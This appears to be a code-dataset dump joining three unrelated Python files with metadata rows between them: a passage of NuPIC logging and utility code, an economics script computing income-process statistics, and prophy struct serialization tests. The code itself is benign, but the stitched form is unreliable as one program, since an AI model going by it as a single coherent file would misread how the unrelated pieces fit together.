from Carbon import Folder, Folders
folderref = Folder.FSFindFolder(Folders.kUserDomain,
Folders.kDocumentsFolderType,
False)
path = folderref.as_pathname()
else:
path = os.getenv('HOME')
return path
#############################################################################
def getArgumentDescriptions(f):
"""
Get the arguments, default values, and argument descriptions for a function.
Returns a list of tuples: (argName, argDescription, defaultValue). If an
argument has no default value, the tuple is only two elements long (as None
cannot be used, since it could be a default value itself).
Parses the argument descriptions out of the function docstring, using a
format something lke this:
[junk]
argument_name: description...
description...
description...
[junk]
[more arguments]
It will find an argument as long as the exact argument name starts the line.
It will then strip a trailing colon, if present, then strip the rest of the
line and use it to start the description. It will then strip and append any
subsequent lines with a greater indent level than the original argument name.
"""
# Get the argument names and default values
argspec = inspect.getargspec(f)
# Scan through the docstring to extract documentation for each argument as
# follows:
# Check the first word of the line, stripping a colon if one is present.
# If it matches an argument name:
# Take the rest of the line, stripping leading whitespeace
# Take each subsequent line if its indentation level is greater than the
# initial indentation level
# Once the indentation level is back to the original level, look for
# another argument
docstring = f.__doc__
descriptions = {}
if docstring:
lines = docstring.split('\n')
i = 0
while i < len(lines):
stripped = lines[i].lstrip()
if not stripped:
i += 1
continue
# Indentation level is index of the first character
indentLevel = lines[i].index(stripped[0])
# Get the first word and remove the colon, if present
firstWord = stripped.split()[0]
if firstWord.endswith(':'):
firstWord = firstWord[:-1]
if firstWord in argspec.args:
# Found an argument
argName = firstWord
restOfLine = stripped[len(firstWord)+1:].strip()
argLines = [restOfLine]
# Take the next lines as long as they are indented more
i += 1
while i < len(lines):
stripped = lines[i].lstrip()
if not stripped:
# Empty line - stop
break
if lines[i].index(stripped[0]) <= indentLevel:
# No longer indented far enough - stop
break
# This line counts too
argLines.append(lines[i].strip())
i += 1
# Store this description
descriptions[argName] = ' '.join(argLines)
else:
# Not an argument
i += 1
# Build the list of (argName, description, defaultValue)
args = []
if argspec.defaults:
defaultCount = len(argspec.defaults)
else:
defaultCount = 0
nonDefaultArgCount = len(argspec.args) - defaultCount
for i, argName in enumerate(argspec.args):
if i >= nonDefaultArgCount:
defaultValue = argspec.defaults[i - nonDefaultArgCount]
args.append((argName, descriptions.get(argName, ""), defaultValue))
else:
args.append((argName, descriptions.get(argName, "")))
return args
#############################################################################
# TODO queryNumInwardIters appears to be unused and should probably be deleted
# from here altogether; it's likely an artifact of the legacy vision support.
#def queryNumInwardIters(configPath, radialLength, numRepetitions=1):
# """
# Public utility API that accepts a config path and
# radial length, and determines the proper number of
# training iterations with which to invoke net.run()
# when running a PictureSensor in 'inward' mode.
# """
# numCats = queryNumCategories(configPath)
# sequenceLen = radialLength + 1
# numItersPerCat = (8 * radialLength) * sequenceLen
# numTrainingItersTP = numItersPerCat * numCats
# return numTrainingItersTP * numRepetitions
#############################################################################
gLoggingInitialized = False
def initLogging(verbose=False, console='stdout', consoleLevel='DEBUG'):
"""
Initilize NuPic logging by reading in from the logging configuration file. The
logging configuration file is named 'nupic-logging.conf' and is expected to be
in the format defined by the python logging module.
If the environment variable 'NTA_CONF_PATH' is defined, then the logging
configuration file is expected to be in the NTA_CONF_PATH directory. If
NTA_CONF_PATH is not defined, then it is found in the 'conf/default'
subdirectory of the NuPic installation directory (typically
~/nupic/current/conf/default)
The logging configuration file can use the environment variable 'NTA_LOG_DIR'
to set the locations of log files. If this variable is not defined, logging to
files will be disabled.
console: Defines console output for the default "root" logging
configuration; this may be one of 'stdout', 'stderr', or None;
Use None to suppress console logging output
consoleLevel:
Logging-level filter string for console output corresponding to
logging levels in the logging module; may be one of:
'DEBUG', 'INFO', 'WARNING', 'ERROR', or 'CRITICAL'.
E.g., a value of'WARNING' suppresses DEBUG and INFO level output
to console, but allows WARNING, ERROR, and CRITICAL
"""
# NOTE: If you call this twice from the same process there seems to be a
# bug - logged messages don't show up for loggers that you do another
# logging.getLogger() on.
global gLoggingInitialized
if gLoggingInitialized:
if verbose:
print >> sys.stderr, "Logging already initialized, doing nothing."
return
consoleStreamMappings = {
'stdout' : 'stdoutConsoleHandler',
'stderr' : 'stderrConsoleHandler',
}
consoleLogLevels = ['DEBUG', 'INFO', 'WARNING', 'WARN', 'ERROR', 'CRITICAL',
'FATAL']
assert console is None or console in consoleStreamMappings.keys(), (
'Unexpected console arg value: %r') % (console,)
assert consoleLevel in consoleLogLevels, (
'Unexpected consoleLevel arg value: %r') % (consoleLevel)
# -----------------------------------------------------------------------
# Setup logging. Look for the nupic-logging.conf file, first in the
# NTA_CONFIG_DIR path (if defined), then in a subdirectory of the nupic
# module
configFilename = 'nupic-logging.conf'
configFilePath = resource_filename("nupic.support", configFilename)
configLogDir = os.environ.get('NTA_LOG_DIR', None)
# Load in the logging configuration file
if verbose:
print >> sys.stderr, (
"Using logging configuration file: %s") % (configFilePath)
# This dict will hold our replacement strings for logging configuration
replacements = dict()
def makeKey(name):
""" Makes replacement key """
return "$$%s$$" % (name)
platform = sys.platform.lower()
if platform.startswith('java'):
# Jython
import java.lang
platform = java.lang.System.getProperty("os.name").lower()
if platform.startswith('mac os x'):
platform = 'darwin'
if platform.startswith('darwin'):
replacements[makeKey('SYSLOG_HANDLER_ADDRESS')] = '"/var/run/syslog"'
elif platform.startswith('linux'):
replacements[makeKey('SYSLOG_HANDLER_ADDRESS')] = '"/dev/log"'
else:
raise RuntimeError("This platform is neither darwin nor linux: %s" % (
sys.platform,))
# Nupic logs go to file
replacements[makeKey('PERSISTENT_LOG_HANDLER')] = 'fileHandler'
replacements[makeKey('FILE_HANDLER_LOG_FILENAME')] = '"/dev/null"'
# Set up log file path for the default file handler and configure handlers
handlers = list()
if configLogDir is not None:
logFilePath = _genLoggingFilePath()
makeDirectoryFromAbsolutePath(os.path.dirname(logFilePath))
replacements[makeKey('FILE_HANDLER_LOG_FILENAME')] = repr(logFilePath)
handlers.append(replacements[makeKey('PERSISTENT_LOG_HANDLER')])
if console is not None:
handlers.append(consoleStreamMappings[console])
replacements[makeKey('ROOT_LOGGER_HANDLERS')] = ", ".join(handlers)
# Set up log level for console handlers
replacements[makeKey('CONSOLE_LOG_LEVEL')] = consoleLevel
customConfig = StringIO()
# Using pkg_resources to get the logging file, which should be packaged and
# associated with this source file name.
loggingFileContents = resource_string(__name__, configFilename)
for lineNum, line in enumerate(loggingFileContents.splitlines()):
if "$$" in line:
for (key, value) in replacements.items():
line = line.replace(key, value)
# If there is still a replacement string in the line, we're missing it
# from our replacements dict
if "$$" in line and "$$<key>$$" not in line:
raise RuntimeError(("The text %r, found at line #%d of file %r, "
"contains a string not found in our replacement "
"dict.") % (line, lineNum, configFilePath))
customConfig.write("%s\n" % line)
customConfig.seek(0)
if python_version()[:3] >= '2.6':
logging.config.fileConfig(customConfig, disable_existing_loggers=False)
else:
logging.config.fileConfig(customConfig)
gLoggingInitialized = True
#############################################################################
def reinitLoggingDir():
""" (Re-)Initialize the loging directory for the calling application that
uses initLogging() for logging configuration
NOTE: It's typially unnecessary to call this function directly since
initLogging takes care of it for you. This function is exposed primarily for
the benefit of nupic-services.py to allow it to restore its logging directory
after the hard-reset operation.
"""
if gLoggingInitialized and 'NTA_LOG_DIR' in os.environ:
makeDirectoryFromAbsolutePath(os.path.dirname(_genLoggingFilePath()))
#############################################################################
def _genLoggingFilePath():
""" Generate a filepath for the calling app """
appName = os.path.splitext(os.path.basename(sys.argv[0]))[0] or 'UnknownApp'
appLogDir = os.path.abspath(os.path.join(
os.environ['NTA_LOG_DIR'],
'numenta-logs-%s' % (os.environ['USER'],),
appName))
appLogFileName = '%s-%s-%s.log' % (
appName, long(time.mktime(time.gmtime())), os.getpid())
return os.path.join(appLogDir, appLogFileName)
#############################################################################
def enableLoggingErrorDebugging():
""" Overrides the python logging facility's Handler.handleError function to
raise an exception instead of print and suppressing it. This allows a deeper
stacktrace to be emitted that is very helpful for quickly finding the
file/line that initiated the invalidly-formatted logging operation.
NOTE: This is for debugging only - be sure to remove the call to this function
*before* checking in your changes to the source code repository, as it will
cause the application to fail if some invalidly-formatted logging statement
still exists in your code.
Example usage: enableLoggingErrorDebugging must be called *after*
initLogging()
import nupic.support
nupic.support.initLogging()
nupic.support.enableLoggingErrorDebugging()
"TypeError: not all arguments converted during string formatting" is an
example exception that might be output by the built-in handlers with the
following very shallow traceback that doesn't go deep enough to show the
source of the problem:
File ".../python2.6/logging/__init__.py", line 776, in emit
msg = self.format(record)
File ".../python2.6/logging/__init__.py", line 654, in format
return fmt.format(record)
File ".../python2.6/logging/__init__.py", line 436, in format
record.message = record.getMessage()
File ".../python2.6/logging/__init__.py", line 306, in getMessage
msg = msg % self.args
TypeError: not all arguments converted during string formatting
"""
print >> sys.stderr, ("WARNING")
print >> sys.stderr, ("WARNING: "
"nupic.support.enableLoggingErrorDebugging() was "
"called to install a debugging patch into all logging handlers that "
"will cause the program to fail if a logging exception occurrs; this "
"call is for debugging only and MUST be removed before checking in code "
"into production system. Caller: %s") % (
traceback.format_stack(),)
print >> sys.stderr, ("WARNING")
def handleErrorPatch(*args, **kwargs):
if logging.raiseExceptions:
raise
for handler in logging._handlerList:
handler.handleError = handleErrorPatch
return
#############################################################################
def clippedObj(obj, maxElementSize=64):
"""
Return a clipped version of obj suitable for printing, This
is useful when generating log messages by printing data structures, but
don't want the message to be too long.
If passed in a dict, list, or namedtuple, each element of the structure's
string representation will be limited to 'maxElementSize' characters. This
will return a new object where the string representation of each element
has been truncated to fit within maxElementSize.
"""
# Is it a named tuple?
if hasattr(obj, '_asdict'):
obj = obj._asdict()
# Printing a dict?
if isinstance(obj, dict):
objOut = dict()
for key,val in obj.iteritems():
objOut[key] = clippedObj(val)
# Printing a list?
elif hasattr(obj, '__iter__'):
objOut = []
for val in obj:
objOut.append(clippedObj(val))
# Some other object
else:
objOut = str(obj)
if len(objOut) > maxElementSize:
objOut = objOut[0:maxElementSize] + '...'
return objOut
###############################################################################
def intTo8ByteArray(inValue):
"""
Converts an int to a packed byte array, with left most significant byte
"""
values = (
(inValue >> 56 ) & 0xff,
(inValue >> 48 ) & 0xff,
(inValue >> 40 ) & 0xff,
(inValue >> 32 ) & 0xff,
(inValue >> 24 ) & 0xff,
(inValue >> 16 ) & 0xff,
(inValue >> 8 ) & 0xff,
inValue & 0xff
)
s = struct.Struct('B B B B B B B B')
packed_data = s.pack(*values)
return packed_data
###############################################################################
def byteArrayToInt(packed_data):
"""
Converts a byte array into an integer
"""
value = struct.unpack('B B B B B B B B', packed_data)
return value[0] << 56 | \
value[1] << 48 | \
value[2] << 40 | \
value[3] << 32 | \
value[4] << 24 | \
value[5] << 16 | \
value[6] << 8 | \
value[7]
###############################################################################
def getSpecialRowID():
"""
Special row id is 0xFF FFFF FFFF FFFF FFFF (9 bytes of 0xFF)
"""
values = (0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF)
s = struct.Struct('B B B B B B B B B')
packed_data = s.pack(*values)
return packed_data
################################################################################
_FLOAT_SECONDS_IN_A_DAY = 24.0 * 60.0 * 60.0
def floatSecondsFromTimedelta(td):
""" Convert datetime.timedelta to seconds in floating point """
sec = (td.days * _FLOAT_SECONDS_IN_A_DAY + td.seconds * 1.0 +
td.microseconds / 1E6)
return sec
#############################################################################
def aggregationToMonthsSeconds(interval):
"""
Return the number of months and seconds from an aggregation dict that
represents a date and time.
Interval is a dict that contain one or more of the following keys: 'years',
'months', 'weeks', 'days', 'hours', 'minutes', seconds', 'milliseconds',
'microseconds'.
Parameters:
---------------------------------------------------------------------
interval: The aggregation interval, as a dict representing a date and time
retval: number of months and seconds in the interval, as a dict:
{months': XX, 'seconds': XX}. The seconds is
a floating point that can represent resolutions down to a
microsecond.
For example:
aggregationMicroseconds({'years': 1, 'hours': 4, 'microseconds':42}) ==
{'months':12, 'seconds':14400.000042}
"""
seconds = interval.get('microseconds', 0) * 0.000001
seconds += interval.get('milliseconds', 0) * 0.001
seconds += interval.get('seconds', 0)
seconds += interval.get('minutes', 0) * 60
seconds += interval.get('hours', 0) * 60 * 60
seconds += interval.get('days', 0) * 24 * 60 * 60
seconds += interval.get('weeks', 0) * 7 * 24 * 60 * 60
months = interval.get('months', 0)
months += 12 * interval.get('years', 0)
return {'months': months, 'seconds': seconds}
#############################################################################
def aggregationDivide(dividend, divisor):
"""
Return the result from dividing two dicts that represent date and time.
Both dividend and divisor are dicts that contain one or more of the following
keys: 'years', 'months', 'weeks', 'days', 'hours', 'minutes', seconds',
'milliseconds', 'microseconds'.
Parameters:
---------------------------------------------------------------------
dividend: The numerator, as a dict representing a date and time
divisor: the denominator, as a dict representing a date and time
retval: number of times divisor goes into dividend, as a floating point
number.
For example:
aggregationDivide({'hours': 4}, {'minutes': 15}) == 16
"""
# Convert each into microseconds
dividendMonthSec = aggregationToMonthsSeconds(dividend)
divisorMonthSec = aggregationToMonthsSeconds(divisor)
# It is a usage error to mix both months and seconds in the same operation
if (dividendMonthSec['months'] != 0 and divisorMonthSec['seconds'] != 0) \
or (dividendMonthSec['seconds'] != 0 and divisorMonthSec['months'] != 0):
raise RuntimeError("Aggregation dicts with months/years can only be "
"inter-operated with other aggregation dicts that contain "
"months/years")
if dividendMonthSec['months'] > 0:
return float(dividendMonthSec['months']) / divisor['months']
else:
return float(dividendMonthSec['seconds']) / divisorMonthSec['seconds']
| gpl-3.0 | 4,127,680,152,068,990,000 | 33.479306 | 80 | 0.6412 | false |
ozak/BoundedConsumption | scripts/incomeprocs.py | 1 | 2312 | #!/usr/bin/env python
# coding: utf-8
'''
======================================================
Author: Ömer Özak, 2013--2014 (ozak at smu.edu)
Website: http://omerozak.com
GitHub: https://github.com/ozak/BoundedConsumption
======================================================
# This code Computes statistics for the income processes used in:
# Howitt, Peter and Özak, Ömer, "Adaptive Consumption Behavior" Journal of Economic Dynamics and Control, 2014, Vol. 39: 37-61 (http://dx.doi.org/10.1016/j.jedc.2013.11.003)
# Author: Ömer Özak
# email: ozak (at) smu.edu
# Date: April 2013
'''
from __future__ import division
import numpy as np
from random import uniform
from scipy.stats import kurtosis, skew
import time,sys,os
# Seed the random number generator
np.random.seed(100)
# Sampling function
def sample(phi):
"""Returns i with probability phi[i], where phi is an
array (e.g., list or tuple)."""
a = 0.0
U = uniform(0,1)
for i in range(len(phi)):
if a < U <= a + phi[i]:
return i
a = a + phi[i]
# Income process 1
y1=np.array([.7,1,1.3])
p1=np.array([.2,.6,.2])
# Income process 2
y2=2*y1
p2=np.array([.2,.6,.2])
# Income process 3
y3=np.array([1,1.4,2,4.1])
p3=np.array([.1,.2,.6,.1])
# Income process 4
y4=np.array([0.3,0.7,1,2.1])
p4=np.array([0.05,0.25,0.6,0.1])
# Income process 4
y5=np.array([0.1,0.7,1,1.3,1.])
p5=np.array([0.05,0.15,0.6,0.15,0.05])
# Basic stats
# For each income process generate a sample of 100000 to approximate distribution and use python tools
n=100000
y=np.array(y1[[sample(p1) for i in range(n)]])
print 'Income Process & Mean & Std & Kurtosis & Skewness\\\\'
print('$Y^1$ & %1.2f & %1.2f & %1.2f & %1.2f \\\\' %(y.mean(),y.std(),kurtosis(y),skew(y)))
y=np.array(y2[[sample(p2) for i in range(n)]])
print('$Y^2$ & %1.2f & %1.2f & %1.2f & %1.2f \\\\' %(y.mean(),y.std(),kurtosis(y),skew(y)))
y=np.array(y3[[sample(p3) for i in range(n)]])
print('$Y^3$ & %1.2f & %1.2f & %1.2f & %1.2f \\\\' %(y.mean(),y.std(),kurtosis(y),skew(y)))
y=np.array(y4[[sample(p4) for i in range(n)]])
print('$Y^4$ & %1.2f & %1.2f & %1.2f & %1.2f \\\\' %(y.mean(),y.std(),kurtosis(y),skew(y)))
y=np.array(y5[[sample(p5) for i in range(n)]])
print('$Y^5$ & %1.2f & %1.2f & %1.2f & %1.2f \\\\' %(y.mean(),y.std(),kurtosis(y),skew(y)))
| gpl-3.0 | -6,109,726,453,913,041,000 | 33.939394 | 173 | 0.588031 | false |
cislaa/prophy | prophy/tests/test_struct.py | 1 | 17273 | import prophy
import pytest
@pytest.fixture(scope = 'session')
def Struct():
class Struct(prophy.with_metaclass(prophy.struct_generator, prophy.struct)):
_descriptor = [("x", prophy.u32),
("y", prophy.u32)]
return Struct
@pytest.fixture(scope = 'session')
def NestedStruct(Struct):
class NestedStruct(prophy.with_metaclass(prophy.struct_generator, prophy.struct)):
_descriptor = [("a", Struct),
("b", Struct)]
return NestedStruct
@pytest.fixture(scope = 'session')
def DeeplyNestedStruct(NestedStruct, Struct):
class DeeplyNestedStruct(prophy.with_metaclass(prophy.struct_generator, prophy.struct)):
_descriptor = [("m", NestedStruct),
("n", Struct),
("o", prophy.u32)]
return DeeplyNestedStruct
def test_struct_assignment(Struct):
x = Struct()
assert x.x == 0
assert x.y == 0
x.x = 3
x.y = 5
with pytest.raises(Exception):
x.nonexistent
with pytest.raises(Exception):
x.nonexistent = 10
y = Struct()
y.x = 9
y.y = 9
y.copy_from(x)
assert y.x == 3
assert y.y == 5
with pytest.raises(Exception):
y.copy_from("123")
with pytest.raises(Exception):
y.copy_from(123)
def test_struct_print(Struct):
x = Struct()
x.x = 1
x.y = 2
assert str(x) == ("x: 1\n"
"y: 2\n")
def test_struct_encode(Struct):
x = Struct()
x.x = 1
x.y = 2
assert x.encode(">") == (b"\x00\x00\x00\x01"
b"\x00\x00\x00\x02")
def test_struct_decode(Struct):
x = Struct()
x.decode((b"\x00\x00\x00\x01"
b"\x00\x00\x00\x02"), ">")
assert x.x == 1
assert x.y == 2
def test_nested_struct_assignment(NestedStruct):
x = NestedStruct()
assert x.a.x == 0
assert x.a.y == 0
assert x.b.x == 0
assert x.b.y == 0
x.a.x = 1
x.a.y = 2
x.b.x = 3
x.b.y = 4
assert x.a.x == 1
assert x.a.y == 2
assert x.b.x == 3
assert x.b.y == 4
y = NestedStruct()
y.a.x = 8
y.a.y = 7
y.b.x = 6
y.b.y = 5
y.copy_from(x)
assert y.a.x == 1
assert y.a.y == 2
assert y.b.x == 3
assert y.b.y == 4
def test_nested_struct_print(NestedStruct):
y = NestedStruct()
y.a.x = 1
y.a.y = 2
y.b.x = 3
y.b.y = 4
assert str(y) == ("a {\n"
" x: 1\n"
" y: 2\n"
"}\n"
"b {\n"
" x: 3\n"
" y: 4\n"
"}\n"
)
def test_nested_struct_encode(NestedStruct):
y = NestedStruct()
y.a.x = 1
y.a.y = 2
y.b.x = 3
y.b.y = 4
assert y.encode(">") == (b"\x00\x00\x00\x01"
b"\x00\x00\x00\x02"
b"\x00\x00\x00\x03"
b"\x00\x00\x00\x04")
def test_nested_struct_decode(NestedStruct):
y = NestedStruct()
y.decode((b"\x00\x00\x00\x01"
b"\x00\x00\x00\x02"
b"\x00\x00\x00\x03"
b"\x00\x00\x00\x04"), ">")
assert y.a.x == 1
assert y.a.y == 2
assert y.b.x == 3
assert y.b.y == 4
def test_deeply_nested_struct_assignment(DeeplyNestedStruct):
x = DeeplyNestedStruct()
assert x.m.a.x == 0
assert x.m.a.y == 0
assert x.m.b.x == 0
assert x.m.b.y == 0
assert x.n.x == 0
assert x.n.y == 0
assert x.o == 0
x.m.a.x = 1
x.m.a.y = 2
x.m.b.x = 3
x.m.b.y = 4
x.n.x = 5
x.n.y = 6
x.o = 7
assert x.m.a.x == 1
assert x.m.a.y == 2
assert x.m.b.x == 3
assert x.m.b.y == 4
assert x.n.x == 5
assert x.n.y == 6
assert x.o == 7
with pytest.raises(Exception):
x.m = 10
y = DeeplyNestedStruct()
y.m.a.x = 8
y.m.a.y = 7
y.m.b.x = 6
y.m.b.y = 5
y.n.x = 4
y.n.y = 3
y.o = 2
y.copy_from(x)
assert y.m.a.x == 1
assert y.m.a.y == 2
assert y.m.b.x == 3
assert y.m.b.y == 4
assert y.n.x == 5
assert y.n.y == 6
assert y.o == 7
def test_deeply_nested_struct_print(DeeplyNestedStruct):
z = DeeplyNestedStruct()
z.m.a.x = 1
z.m.a.y = 2
z.m.b.x = 3
z.m.b.y = 4
z.n.x = 5
z.n.y = 6
z.o = 7
assert str(z) == ("m {\n"
" a {\n"
" x: 1\n"
" y: 2\n"
" }\n"
" b {\n"
" x: 3\n"
" y: 4\n"
" }\n"
"}\n"
"n {\n"
" x: 5\n"
" y: 6\n"
"}\n"
"o: 7\n")
def test_deeply_nested_struct_encode(DeeplyNestedStruct):
z = DeeplyNestedStruct()
z.m.a.x = 1
z.m.a.y = 2
z.m.b.x = 3
z.m.b.y = 4
z.n.x = 5
z.n.y = 6
z.o = 7
assert z.encode(">") == (b"\x00\x00\x00\x01"
b"\x00\x00\x00\x02"
b"\x00\x00\x00\x03"
b"\x00\x00\x00\x04"
b"\x00\x00\x00\x05"
b"\x00\x00\x00\x06"
b"\x00\x00\x00\x07")
def test_deeply_nested_struct_decode(DeeplyNestedStruct):
z = DeeplyNestedStruct()
z.decode((b"\x00\x00\x00\x01"
b"\x00\x00\x00\x02"
b"\x00\x00\x00\x03"
b"\x00\x00\x00\x04"
b"\x00\x00\x00\x05"
b"\x00\x00\x00\x06"
b"\x00\x00\x00\x07"), ">")
assert z.m.a.x == 1
assert z.m.a.y == 2
assert z.m.b.x == 3
assert z.m.b.y == 4
assert z.n.x == 5
assert z.n.y == 6
assert z.o == 7
def test_empty_struct():
class Empty(prophy.with_metaclass(prophy.struct_generator, prophy.struct)):
_descriptor = []
x = Empty()
assert "" == str(x)
assert b"" == x.encode(">")
assert 0 == x.decode("", ">")
class X(prophy.with_metaclass(prophy.struct_generator, prophy.struct)):
_descriptor = [("a", Empty)]
x = X()
assert """\
a {
}
""" == str(x)
assert b"" == x.encode(">")
assert 0 == x.decode("", ">")
def test_struct_with_dynamic_fields():
class X(prophy.with_metaclass(prophy.struct_generator, prophy.struct)):
_descriptor = [("x_len", prophy.u32),
("x", prophy.array(prophy.u8, bound = "x_len")),
("y", prophy.u32)]
assert X._SIZE == 8
x = X()
x.x[:] = [1, 2, 3]
x.y = 4
assert b'\x03\x00\x00\x00\x01\x02\x03\x00\x04\x00\x00\x00' == x.encode('<')
x.decode(b'\x01\x00\x00\x00\x01\x00\x00\x00\x08\x00\x00\x00', '<')
assert x.x[:] == [1]
assert x.y == 8
def test_struct_with_many_arrays():
class X(prophy.with_metaclass(prophy.struct_generator, prophy.struct)):
_descriptor = [("x_len", prophy.u32),
("x", prophy.array(prophy.u8, bound = "x_len")),
("y_len", prophy.u16),
("y", prophy.array(prophy.u16, bound = "y_len")),
("z_len", prophy.u8),
("z", prophy.array(prophy.u64, bound = "z_len"))]
x = X()
x.x[:] = [1, 2, 3, 4, 5]
x.y[:] = [1, 2]
x.z[:] = [1, 2, 3]
assert (b"\x00\x00\x00\x05"
b"\x01\x02\x03\x04"
b"\x05\x00"
b"\x00\x02\x00\x01"
b"\x00\x02"
b"\x03\x00\x00\x00\x00\x00\x00\x00"
b"\x00\x00\x00\x00\x00\x00\x00\x01"
b"\x00\x00\x00\x00\x00\x00\x00\x02"
b"\x00\x00\x00\x00\x00\x00\x00\x03") == x.encode('>')
def test_struct_with_many_arrays_mixed():
class X(prophy.with_metaclass(prophy.struct_generator, prophy.struct)):
_descriptor = [("x_len", prophy.u32),
("y_len", prophy.u16),
("x", prophy.array(prophy.u8, bound = "x_len")),
("y", prophy.array(prophy.u16, bound = "y_len"))]
x = X()
x.x[:] = [1, 2, 3, 4, 5]
x.y[:] = [1, 2]
assert (b"\x00\x00\x00\x05"
b"\x00\x02"
b"\x01\x02\x03\x04"
b"\x05\x00"
b"\x00\x01\x00\x02") == x.encode('>')
def test_struct_with_many_arrays_padding():
class X(prophy.with_metaclass(prophy.struct_generator, prophy.struct)):
_descriptor = [("x_len", prophy.u8),
("x", prophy.array(prophy.u8, bound = "x_len")),
("y_len", prophy.u32),
("y", prophy.array(prophy.u8, bound = "y_len")),
("z", prophy.u64)]
class Y(prophy.with_metaclass(prophy.struct_generator, prophy.struct)):
_descriptor = [("x", prophy.u8),
("y", X)]
x = Y()
x.x = 1
x.y.x[:] = [2, 3]
x.y.y[:] = [4, 5]
x.y.z = 6
assert x.encode('>') == (b'\x01\x00\x00\x00'
b'\x00\x00\x00\x00'
b'\x02\x02\x03\x00'
b'\x00\x00\x00\x02'
b'\x04\x05\x00\x00'
b'\x00\x00\x00\x00'
b'\x00\x00\x00\x00'
b'\x00\x00\x00\x06')
x.decode(b'\x05\x00\x00\x00'
b'\x00\x00\x00\x00'
b'\x04\x02\x03\x04'
b'\x05\x00\x00\x00'
b'\x00\x00\x00\x03'
b'\x04\x05\x06\x00'
b'\x00\x00\x00\x00'
b'\x00\x00\x00\x06', '>')
assert x.x == 5
assert x.y.x == [2, 3, 4, 5]
assert x.y.y == [4, 5, 6]
assert x.y.z == 6
def test_struct_with_many_arrays_fixed_tail():
class X(prophy.with_metaclass(prophy.struct_generator, prophy.struct)):
_descriptor = [("x_len", prophy.u8),
("x", prophy.array(prophy.u8, bound = "x_len")),
("y", prophy.u32),
("z", prophy.u64)]
x = X()
x.x[:] = [2, 3]
x.y = 4
x.z = 5
assert x.encode('>') == (b'\x02\x02\x03\x00'
b'\x00\x00\x00\x00'
b'\x00\x00\x00\x04'
b'\x00\x00\x00\x00'
b'\x00\x00\x00\x00'
b'\x00\x00\x00\x05')
x.decode((b'\x04\x06\x07\x08'
b'\x09\x00\x00\x00'
b'\x00\x00\x00\x05'
b'\x00\x00\x00\x00'
b'\x00\x00\x00\x00'
b'\x00\x00\x00\x06'), '>')
assert x.x == [6, 7, 8, 9]
assert x.y == 5
assert x.z == 6
def test_struct_exception_with_access_to_nonexistent_field():
with pytest.raises(AttributeError):
class X(prophy.with_metaclass(prophy.struct_generator, prophy.struct)):
_descriptor = [("a", prophy.u32)]
X().im_not_there
def test_struct_encoding_with_scalars():
class S(prophy.with_metaclass(prophy.struct_generator, prophy.struct)):
_descriptor = [("a", prophy.u8),
("b", prophy.u16),
("c", prophy.u8)]
x = S()
x.a = 1
x.b = 2
x.c = 3
assert b"\x01\x00\x00\x02\x03\x00" == x.encode(">")
assert b"\x01\x00\x02\x00\x03\x00" == x.encode("<")
assert 6 == x.decode(b"\x06\x00\x00\x07\x08\x00", ">")
assert 6 == x.a
assert 7 == x.b
assert 8 == x.c
def test_struct_encoding_with_inner_struct():
class A(prophy.with_metaclass(prophy.struct_generator, prophy.struct)):
_descriptor = [("a", prophy.u16),
("b", prophy.u8)]
class B(prophy.with_metaclass(prophy.struct_generator, prophy.struct)):
_descriptor = [("a", A),
("b", prophy.u64)]
x = B()
x.a.a = 1
x.a.b = 2
x.b = 3
assert b"\x00\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03" == x.encode(">")
assert 16 == x.decode(b"\x00\x0a\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0c", ">")
assert 0xa == x.a.a
assert 0xb == x.a.b
assert 0xc == x.b
def test_struct_encoding_with_arrays():
class A(prophy.with_metaclass(prophy.struct_generator, prophy.struct)):
_descriptor = [("a", prophy.array(prophy.u8, size = 3)),
("b_len", prophy.u16),
("b", prophy.array(prophy.u32, bound = "b_len"))]
x = A()
x.a[:] = [1, 2, 3]
x.b[:] = [4, 5, 6]
assert (b"\x01\x02\x03\x00"
b"\x00\x03\x00\x00"
b"\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\x06") == x.encode(">")
assert 16 == x.decode((b"\x04\x05\x06\x00"
b"\x00\x02\x00\x00"
b"\x00\x00\x00\x01\x00\x00\x00\x02"), ">")
assert [4, 5, 6] == x.a[:]
assert [1, 2] == x.b[:]
def test_struct_with_multiple_dynamic_fields():
class A(prophy.with_metaclass(prophy.struct_generator, prophy.struct)):
_descriptor = [("a_len", prophy.u16),
("b_len", prophy.u8),
("a", prophy.array(prophy.u32, bound = "a_len")),
("b", prophy.array(prophy.u8, bound = "b_len"))]
x = A()
x.a[:] = [1, 2]
x.b[:] = [3, 4]
assert b'\x00\x02\x02\x00\x00\x00\x00\x01\x00\x00\x00\x02\x03\x04\x00\x00' == x.encode('>')
assert b'\x02\x00\x02\x00\x01\x00\x00\x00\x02\x00\x00\x00\x03\x04\x00\x00' == x.encode('<')
x.decode(b'\x01\x00\x03\x00\x05\x00\x00\x00\x02\x01\x00', '<')
assert [5] == x.a[:]
assert [2, 1, 0] == x.b[:]
def test_struct_with_greedy_bytes():
class A(prophy.with_metaclass(prophy.struct_generator, prophy.struct)):
_descriptor = [("a_len", prophy.u16),
("a", prophy.array(prophy.u16, bound = "a_len")),
("b", prophy.bytes())]
x = A()
x.a[:] = [5, 6, 7]
x.b = b'ala ma kota'
assert b'\x00\x03\x00\x05\x00\x06\x00\x07ala ma kota\x00' == x.encode('>')
assert b'\x03\x00\x05\x00\x06\x00\x07\x00ala ma kota\x00' == x.encode('<')
x.decode(b'\x00\x01\x00\x08abacus\x00\x00', '>')
assert [8] == x.a[:]
assert b'abacus\x00\x00' == x.b
def test_struct_with_and_without_padding():
class A(prophy.with_metaclass(prophy.struct_generator, prophy.struct)):
_descriptor = [("a", prophy.u8),
("b", prophy.u16),
("c", prophy.u64),
("d", prophy.u8)]
class B(prophy.with_metaclass(prophy.struct_generator, prophy.struct_packed)):
_descriptor = [("a", prophy.u8),
("b", prophy.u16),
("c", prophy.u64),
("d", prophy.u8)]
x = A()
x.a = 1
x.b = 2
x.c = 3
x.d = 4
assert b'\x01\x00'b'\x02\x00\x00\x00\x00\x00'b'\x03\x00\x00\x00\x00\x00\x00\x00'b'\x04\x00\x00\x00\x00\x00\x00\x00' == x.encode('<')
x.decode(b'\x04\x00'b'\x05\x00\x00\x00\x00\x00'b'\x06\x00\x00\x00\x00\x00\x00\x00'b'\x07\x00\x00\x00\x00\x00\x00\x00', '<')
assert x.a == 4
assert x.b == 5
assert x.c == 6
assert x.d == 7
x = B()
x.a = 1
x.b = 2
